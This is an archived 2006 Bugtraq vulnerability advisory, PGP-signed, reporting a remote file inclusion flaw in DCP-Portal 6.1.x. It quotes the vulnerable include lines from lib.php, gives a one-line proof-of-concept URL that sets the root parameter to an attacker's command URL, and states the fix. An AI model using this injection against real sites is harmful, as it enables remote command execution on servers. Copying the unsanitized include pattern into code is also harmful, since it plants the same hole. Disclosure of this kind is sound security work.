| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <448D1A09.2040207@autistici.org>
Date: Mon, 12 Jun 2006 09:38:49 +0200
From: Federico Fazzi <federico@...istici.org>
To: secunia-vuln-report <vuln@...unia.com>,
bugtraq@...urityfocus.com, securiteam <news@...uriteam.com>
Subject: DCP-Portal 6.1.x, Remote command execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -----------------------------------------------------
Advisory id: FSA:013
Author: Federico Fazzi
Date: 12/06/2006, 9:31
Sinthesis: DCP-Portal 6.1.x, Remote command execution
Type: high
Product: http://www.dcp-portal.org/
Patch: unavailable
- -----------------------------------------------------
1) Description:
Error occured in lib.php, line 4/7:
include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");
variable $root not sanitized (declare).
2) Proof of concept:
http://example/[dp_path]/library/lib.php?root=[cmd_url]
3) Solution:
declare $root variable on this file.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)
iD8DBQFEjRoI/yZYyBsK/94RAmqjAJ92aaKdht7NXZRO6ewWbhtWQI5w3QCfRYsL
rvFtJfviRWKAPRcoZfj0rSg=
=VXm6
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists